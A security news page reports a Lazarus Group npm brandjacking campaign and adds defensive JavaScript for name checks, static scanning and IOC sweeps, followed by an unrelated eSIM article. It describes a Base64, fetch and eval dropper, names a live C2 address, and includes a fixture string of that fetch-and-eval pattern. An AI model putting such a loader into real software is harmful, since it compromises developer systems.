Lazarus Group Uses npm Brandjacking Campaign to Target Developers

North Korean Lazarus Group targets npm developers with brandjacking packages that mimic trusted tools, drop malware and put credentials at risk.

A new npm campaign linked to North Korea’s Lazarus Group shows how attackers are using familiar-looking package names to gain access to developers’ systems and software build environments.

Sonatype Security Research said it is tracking dozens of malicious npm packages connected to the campaign, including some that reached up to 500 weekly downloads. The packages were designed to look related to trusted JavaScript projects and tools, increasing the chance that developers would install them during normal work.

More Than npm Typosquatting

Campaigns like this usually rely on typosquatting, but in this case Sonatype found packages using brandjacking methods such as suffix additions, embedded project names, and version mimicry. Examples spotted by researchers included names built around well-known projects such as Buffer, Chai, React, Express, JWT, and Webpack.

That naming strategy works in attackers' favor because npm is full of small helper libraries, wrappers, and plugins. A package called buffer-utilities, for example, can look like a reasonable companion to the widely used buffer package even though it has no legitimate connection to the project.
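The three naming tricks described above can be turned into a review signal for a dependency list. The following is an added example, not code from Sonatype or from the article: it tokenizes an npm package name and reports suffix additions (buffer-utilities), embedded project names (secure-chai-plugin), and version mimicry (express4, react-18) against a list of trusted projects. The trusted list is a constructed sample built from the projects the article names; a real deployment would use the allow-list of dependencies your builds expect.

```javascript
// Added example, not code from Sonatype or the article: surface npm package names that
// ride on a trusted project's name by suffix addition (buffer-utilities), by embedding
// the name in the middle (secure-chai-plugin), or by version mimicry (express4, react-18).
// TRUSTED_PROJECTS is a constructed sample from the projects the article names.
const TRUSTED_PROJECTS = ["buffer", "chai", "react", "express", "jwt", "webpack"];

// Drop any @scope/ prefix and split on the separators npm names commonly use.
function tokenize(name) {
  return name.toLowerCase().replace(/^@[^/]+\//, "").split(/[-_.]+/).filter(Boolean);
}

// True when a token is the project name fused with digits (express4) or the project
// token is followed by a bare version-looking token (react-18, webpack-v5).
function looksLikeVersionMimicry(tokens, project) {
  return tokens.some((t, i) => {
    const fused = t.startsWith(project) && /^\d+$/.test(t.slice(project.length));
    const split = t === project && i + 1 < tokens.length && /^v?\d+$/.test(tokens[i + 1]);
    return fused || split;
  });
}

// Returns [{project, signal}, ...]; an empty list means nothing to review.
// These are review signals, not verdicts: npm legitimately hosts many companion packages
// (react-dom will be flagged as a suffix addition, and that is expected).
function brandjackSignals(candidate, trusted = TRUSTED_PROJECTS) {
  const tokens = tokenize(candidate);
  const signals = [];
  for (const project of trusted) {
    if (tokens.length === 1 && tokens[0] === project) continue; // the genuine package
    if (looksLikeVersionMimicry(tokens, project)) {
      signals.push({ project, signal: "version-mimicry" });
    } else if (tokens[0] === project && tokens.length > 1) {
      signals.push({ project, signal: "suffix-addition" });
    }
    if (tokens.indexOf(project) > 0) {
      signals.push({ project, signal: "embedded-name" });
    }
  }
  return signals;
}

// Review a whole dependency list at once, e.g. Object.keys(packageJson.dependencies).
function reviewDependencies(names, trusted = TRUSTED_PROJECTS) {
  const report = {};
  for (const n of names) {
    const s = brandjackSignals(n, trusted);
    if (s.length) report[n] = s;
  }
  return report;
}

// Constructed sample dependency list for demonstration.
console.log(reviewDependencies(["buffer", "buffer-utilities", "express4", "secure-chai-plugin", "lodash"]));
```

The output is meant to be read by a human before install, not acted on automatically: a hit tells you to open the package page and check the publisher, repository link, and download history, which is exactly the step the brandjacked names are designed to make you skip.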

Sonatype’s analysis of buffer-utilities found that the package included code copied from the real buffer library but also worked as a malicious dropper. Once installed, it decoded Base64-encoded URLs, fetched remote content from www.jsonkeeper.com, and executed the retrieved code using eval().

Researchers said that the pattern appeared in other packages linked to the same Lazarus activity. The use of www.jsonkeeper.com is also notable because Sonatype has previously observed Lazarus using the service to host payloads.

After the first stage runs, the malware can install a Node.js backdoor and downloader. That payload collects basic system details, including the hostname, username, operating system, home directory, and process arguments, then contacts the command-and-control infrastructure to receive further instructions.

The malware can also create a hidden .vscode directory in the user’s home folder, download more files, and launch attacker-controlled JavaScript as a detached background process. Sonatype said the package can fetch a third-stage payload called f.js along with a package.json file, then run npm install --silent before starting the payload.

That behavior gives the attacker a way to maintain access and refresh malicious files over time. Sonatype also reported an update mechanism that lets the payload reconnect to the command-and-control servers, check for newer versions, and replace local files.
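The traits described in the last few paragraphs (Base64-decoded URLs, a remote fetch, eval() of the response, a hidden .vscode directory, a detached child process, npm install --silent) are all visible in package source before anything runs. The following is an added example, not Sonatype's tooling or code from the campaign: a small static scanner that looks for those traits across a package's files and reduces them to a verdict. The regexes and the verdict thresholds are my own choices, and the two sample packages at the bottom are constructed inputs written only to exercise the scanner.

```javascript
// Added example, not code from Sonatype or the article: flag the dropper and backdoor
// traits the article describes in a package's JavaScript source before it enters a build.
// Regexes and verdict rules are my own choices; the sample sources below are constructed.
const TRAITS = [
  { id: "base64-decode",  re: /Buffer\.from\([^)]*['"]base64['"]\)|\batob\(/ },
  { id: "remote-fetch",   re: /\b(?:https?\.(?:get|request)|fetch|axios\.(?:get|post))\(/ },
  { id: "dynamic-eval",   re: /\beval\(|new Function\(/ },
  { id: "known-host",     re: /jsonkeeper\.com/ },
  { id: "hidden-vscode",  re: /\.vscode/ },
  { id: "detached-child", re: /detached\s*:\s*true/ },
  { id: "silent-install", re: /npm install --silent/ },
];

// Return the trait ids found in one source file.
function scanSource(src) {
  return TRAITS.filter(t => t.re.test(src)).map(t => t.id);
}

// Aggregate traits across a package's files ({path: source}) and reduce them to a verdict:
//   "dropper-pattern"     decode + fetch + eval together (the first stage the article describes)
//   "persistence-pattern" hidden .vscode dir plus a detached child or silent install
//   "known-host-contact"  the payload host the article names appears in the source
//   "review"              any single trait on its own (Base64 decoding alone is common)
//   "clean"               nothing matched
function scanPackage(files) {
  const traits = new Set();
  const hits = {};
  for (const [path, src] of Object.entries(files)) {
    const found = scanSource(src);
    if (found.length) hits[path] = found;
    found.forEach(id => traits.add(id));
  }
  const has = (...ids) => ids.every(id => traits.has(id));
  let verdict = "clean";
  if (has("base64-decode", "remote-fetch", "dynamic-eval")) verdict = "dropper-pattern";
  else if (has("hidden-vscode", "detached-child") || has("hidden-vscode", "silent-install")) verdict = "persistence-pattern";
  else if (traits.has("known-host")) verdict = "known-host-contact";
  else if (traits.size > 0) verdict = "review";
  return { verdict, traits: [...traits], hits };
}

// Constructed sample in the shape of the described first stage: decode a Base64 URL,
// fetch it, eval the body. ENCODED and https are deliberately left undefined; this text
// is scanner input only and is never executed.
const SUSPICIOUS_FILES = {
  "index.js": "module.exports = require('./lib/buffer-copy');",
  "lib/loader.js": [
    "const url = Buffer.from(ENCODED, 'base64').toString('utf8');",
    "https.get(url, res => { let body = ''; res.on('data', c => body += c); res.on('end', () => eval(body)); });",
  ].join("\n"),
};

// Constructed benign sample: decoding Base64 on its own should only rate "review".
const BENIGN_FILES = {
  "index.js": "exports.decode = s => Buffer.from(s, 'base64').toString('utf8');",
};

console.log(scanPackage(SUSPICIOUS_FILES));
console.log(scanPackage(BENIGN_FILES));
```

Run this over the extracted tarball of a candidate dependency (read each .js file into the files map) before it is added to a lockfile. The verdict is deliberately coarse: a "review" on a Base64 helper is noise, but decode, fetch and eval appearing together in a package that claims to be a buffer utility is the combination the article describes and deserves a manual look regardless of download count.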

[Infographic explaining the campaign (Credit: Hackread.com)]

The campaign shows why npm remains attractive to advanced threat actors. Developers often install packages based on name familiarity, project fit, or convenience, especially in JavaScript environments where small dependencies are common.

The Lazarus connection adds weight to the findings. While the group is often associated with financial theft and high-profile cyber espionage operations, this activity shows the group’s interest in developer machines, credentials, build systems, and long-term access to enterprise environments.

Protect Your Devices

Organizations that installed buffer-utilities version 1.0.0 or packages associated with Sonatype identifier sonatype-2026-003558 should remove them and review affected systems for signs of further compromise. Sonatype warned that removal alone may not be enough if later payloads have already run.

Administrators should also check for network connections to www.jsonkeeper.com, command-and-control traffic to 45.59.163.198:1244, unexpected .vscode folders in user home directories, unusual Node.js processes, and any unexplained credential access from developer workstations or build systems.
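The indicators in the two paragraphs above can be checked against data a responder usually already has: a parsed package-lock.json, proxy or firewall log lines, and a listing of developer home directories. The following is an added example, not Sonatype's tooling: the package name and version, the hostname and the IP:port come from the article, while the lockfile, log lines and home-directory listings are constructed samples. One caveat a responder would want: VS Code itself creates ~/.vscode (for extensions and argv.json), so the folder alone is only a lead, and the example reports its contents so an analyst can judge it rather than treating its presence as a hit.

```javascript
// Added example, not Sonatype's tooling: run the article's indicators against in-memory
// samples of data a responder already has. Only the package name/version, the hostname
// and the IP:port come from the article; every other value below is constructed.
const IOC = {
  packages: [{ name: "buffer-utilities", version: "1.0.0" }],
  hosts: ["www.jsonkeeper.com"],
  endpoints: ["45.59.163.198:1244"],
  hiddenDir: ".vscode",
};

// Walk a lockfile v2/v3 "packages" map; keys look like "node_modules/<name>" or
// "node_modules/<parent>/node_modules/<name>" for nested installs. Assumes lockfile v2/v3.
function findIocPackages(lock, ioc = IOC) {
  const found = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const name = path.split("node_modules/").pop();
    for (const bad of ioc.packages) {
      if (name === bad.name && (!bad.version || entry.version === bad.version)) {
        found.push({ path, version: entry.version });
      }
    }
  }
  return found;
}

// Match each log line against the payload host and the C2 IP:port; returns {line, indicator}.
function findIocConnections(logLines, ioc = IOC) {
  const indicators = [...ioc.hosts, ...ioc.endpoints];
  const matches = [];
  for (const line of logLines) {
    for (const indicator of indicators) {
      if (line.includes(indicator)) matches.push({ line, indicator });
    }
  }
  return matches;
}

// homes: {"/home/alice": [entries...]}; dirContents: {"/home/alice/.vscode": [entries...]}.
// VS Code's own ~/.vscode normally holds an extensions directory and argv.json, so loose
// .js files or a package.json directly inside it are what an analyst should look at.
function findHiddenDirs(homes, dirContents = {}, ioc = IOC) {
  const leads = [];
  for (const [home, entries] of Object.entries(homes)) {
    if (!entries.includes(ioc.hiddenDir)) continue;
    const path = `${home}/${ioc.hiddenDir}`;
    const contents = dirContents[path] || [];
    const suspicious = contents.filter(f => f.endsWith(".js") || f === "package.json");
    leads.push({ path, suspicious });
  }
  return leads;
}

function sweep(lock, logLines, homes, dirContents) {
  return {
    packages: findIocPackages(lock),
    connections: findIocConnections(logLines),
    hiddenDirs: findHiddenDirs(homes, dirContents),
  };
}

// Constructed samples for demonstration.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "internal-app", dependencies: { buffer: "^6.0.3", "buffer-utilities": "1.0.0" } },
    "node_modules/buffer": { version: "6.0.3" },
    "node_modules/buffer-utilities": { version: "1.0.0" },
  },
};
const SAMPLE_PROXY_LOG = [
  "2026-01-10T09:12:03Z CONNECT www.jsonkeeper.com:443 user=alice host=dev-ws-07",
  "2026-01-10T09:12:09Z TCP 10.0.4.17:51822 -> 45.59.163.198:1244 SYN host=dev-ws-07",
  "2026-01-10T09:13:00Z CONNECT registry.npmjs.org:443 user=bob host=dev-ws-12",
];
const SAMPLE_HOMES = {
  "/home/alice": [".bashrc", ".vscode", "projects"],
  "/home/bob": [".bashrc", ".npmrc", "src"],
};
// Constructed illustration of what a dropped directory might list; not from the article.
const SAMPLE_DIR_CONTENTS = {
  "/home/alice/.vscode": ["f.js", "package.json", "node_modules"],
};

console.log(JSON.stringify(sweep(SAMPLE_LOCK, SAMPLE_PROXY_LOG, SAMPLE_HOMES, SAMPLE_DIR_CONTENTS), null, 2));
```

In practice the lockfile comes from JSON.parse of each repository's package-lock.json, the log lines from the proxy or firewall export, and the home listings from an endpoint agent or a one-off directory walk. The package check is pinned to version 1.0.0 because that is the version the article names; drop the version field in IOC to catch any release of the same name.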

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cybersecurity and tech world. I am also into gaming, reading and investigative journalism.

Why eSIMs Are Replacing Traditional SIM Cards

From SIM swap protection to remote provisioning, eSIMs are quickly replacing physical SIM cards. Here’s why the shift matters for security and convenience.

The physical SIM card is becoming less important with every new phone release. For years, that tiny plastic card was the key to getting a device connected. Now, eSIM technology is giving users a simpler way to activate mobile service, switch plans, and protect their number. Industry forecasts expect eSIMs to make up most smartphone connections by 2030, which shows how quickly mobile networks and device makers are moving in this direction.

Resistance to SIM Swap Attacks

Physical SIM cards have long been a weak point in SIM swap scams. In a typical case, a scammer convinces a carrier representative to move a victim’s phone number to a SIM card they control. Once that happens, the scammer can receive calls, texts, and SMS-based two-factor codes meant for the real owner.

The FBI’s 2025 Internet Crime Report recorded 971 SIM swap complaints, with reported losses of $17.4 million. Consumer advocates describe these scams as especially damaging because many victims only realize what has happened after their phone suddenly loses service or their number is activated on another device. eSIMs do not remove the risk completely, but they reduce some of the openings scammers use, including stolen physical cards and in-person SIM handoffs.

Instant Remote Provisioning

With a physical SIM, getting connected usually means inserting a card into the phone. With an eSIM, the setup happens digitally. A user can scan a QR code, use a carrier app, or activate a plan during device setup. The carrier profile is then added to the phone over the air using eUICC (Embedded Universal Integrated Circuit Card).

That small change makes a big difference. A new plan can be activated in minutes without waiting for a card to arrive in the mail or visiting a carrier store. For businesses, the benefit is even clearer. A company can set up phones, tablets, trackers, or connected equipment without sending staff to handle plastic SIM cards one by one.

Multiple Profiles on One Device

Many smartphones can store several eSIM profiles, although only one or two may be active at the same time. That means one phone can hold a personal number, a work number, and a travel data plan without swapping cards.

This is useful for privacy and travel as well. A user can keep work and personal lines separate, or install a short-term data plan before leaving for another country. Saily eSIM, a travel eSIM service from Nord Security, describes this as an app-based setup that lets users add data plans for different destinations on the same device. If the phone is lost or stolen, the user can contact the carriers and have the eSIM lines deactivated remotely.

Tamper-Resistant Hardware and Protected Credentials

A physical SIM card can be removed from a tray. An eSIM is built into the device, so it cannot be taken out, misplaced, or replaced with another card. That alone makes it harder for someone to interfere with the mobile connection by handling the SIM directly.

The credentials linked to the mobile account are stored inside protected hardware on the device. The eSIM still performs the same basic role as a normal SIM, but without exposing a removable card. For everyday users, the security benefit happens in the background. They activate the plan once, then use the phone as usual.

Phones, Tablets, and Wearables Are Moving to eSIM

Major device makers have been adding eSIM support for years. Apple has already sold eSIM-only iPhone models in several markets, and Google Pixel phones have supported eSIM for a long time. Many smartwatches and cellular tablets also use eSIM because their small designs leave little room for a traditional SIM tray.

This direction makes sense for manufacturers. Removing the SIM tray can free up internal space, improve device sealing, and simplify activation. It also gives carriers and users more flexibility when plans need to be added, changed, or removed.

Scalability for IoT and Enterprise Fleets

eSIM technology is also becoming important for connected devices outside the smartphone market. Cars, sensors, industrial machines, payment terminals, and trackers often need mobile service from the moment they leave the factory. They may also need to change networks later, especially when used in different countries.

In 2023, the GSMA released SGP.32, a standard designed to help companies manage eSIMs in IoT devices remotely. For businesses running many connected devices, this can cut down on manual setup, shipping delays, and service interruptions. A physical SIM can work for one device, but it becomes harder to manage when a company has thousands of them in the field.

What This Means for Everyday Users and Travelers

For most people, the move to eSIM will feel simple. Buy a phone, scan a QR code, or follow the carrier setup steps, and the device is connected. The biggest change is what disappears from the process: fewer store visits, fewer tiny cards to handle, and less waiting.

Travelers may notice the benefit even more. An eSIM can be installed before a trip and activated after landing, giving access to local, regional, or global data without searching for a SIM card at the airport. It also removes the risk of losing a small card while moving between countries.

Traditional SIM cards are not gone yet, but their role is shrinking. eSIMs give users faster setup, easier travel options, cleaner device design, and better protection against some common SIM-related attacks. For phones, wearables, tablets, and connected devices, the direction is already clear.

(Photo by Opal Pierce on Unsplash)